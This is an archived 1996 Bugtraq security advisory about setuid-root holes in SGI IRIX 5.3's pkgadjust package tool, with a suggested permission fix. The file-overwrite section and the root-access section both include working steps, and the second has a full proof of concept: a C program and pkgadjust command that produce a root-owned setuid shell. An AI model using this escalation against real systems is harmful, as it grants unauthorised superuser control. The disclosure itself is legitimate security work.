[2480] in bugtraq
Security hole in SGI package installation system
daemon@ATHENA.MIT.EDU (Hui-Hui Hu)
Sat Jan 27 17:08:22 1996
Date: Sat, 27 Jan 1996 10:57:02 -0500
Reply-To: Bugtraq List <BUGTRAQ@CRIMELAB.COM>
From: Hui-Hui Hu <hhui@stardot.net>
X-To: BUGTRAQ@CRIMELAB.COM
To: Multiple recipients of list BUGTRAQ <BUGTRAQ@CRIMELAB.COM>
There are many major security holes in SGI's package installation system
for IRIX 5.3. The code appears to have been written without proper
consideration of the implications of setuid. Any user can gain superuser
access as well as overwrite-to-destroy files.
The main program that pkg{info,rm,etc} call is /usr/pkg/bin/pkgadjust,
which is setuid root.
PROGRAM. pkgadjust (from eoe2.sw.oampkg)
AFFECTS. SGI IRIX 5.3. IRIX 5.2 is not affected; unsure about IRIX 6.
REQUIRED. Account on server
RISK. superuser
AUTHOR. Tung-Hui Hu <hhui@stardot.net>
---
PROBLEM 1. pkgadjust will allow any user to overwrite any file because it
allows one to set via command line:
-o write debugging output to <file> rather than to stderr
Since pkgadjust does not check for ownership, etc. this will destroy the
file, leading to a denial of service/removal of authorization checks.
---
PROBLEM 2. pkgadjust will allow any user to gain superuser access.
One can set programs to list installed packages via command line options
-a <cmd> normally 'versions long' command line
-b <cmd> normally 'versions -v' command line
This is trivially exploited:
% cat > getroot.c
int main() { setuid(0); chown("sh",0,0); chmod("sh",04755); return 0; }
% cc getroot.c -o getroot
% cp /bin/sh sh
% ls -la sh
-rwxr-xr-x 1 hhui user 140784 Jan 5 20:52 sh
% /usr/pkg/bin/pkgadjust -f -a getroot
scanning inst-database
updating pkginfo-files
........................................^C
% ls -la sh
-rwsr-xr-x 1 root sys 140784 Jan 5 20:52 sh
% panic
---
FIX.
# chmod 700 /usr/pkg/bin/pkgadjust
DISCUSSION. No sermons here, but I really doubt the program was
written for setuid. Since most users can't write to the lockfile
in /var/sadm, many pkg* commands are unavailable. I also found
these files improperly permissioned and would recommend removing setuid:
-rwsr-xr-x 1 root sys 838 Sep 27 11:27 /usr/lib/X11/
app-defaults/ISDN
-rws--x--x 1 root sys 18632 Sep 27 10:59 /usr/pkg/bin/abspath
Tung-Hui Hu / '97 Comparative Literature / Princeton Universe
hhui@stardot.com / the STATIC: http://www.stardot.com/~hhui/static
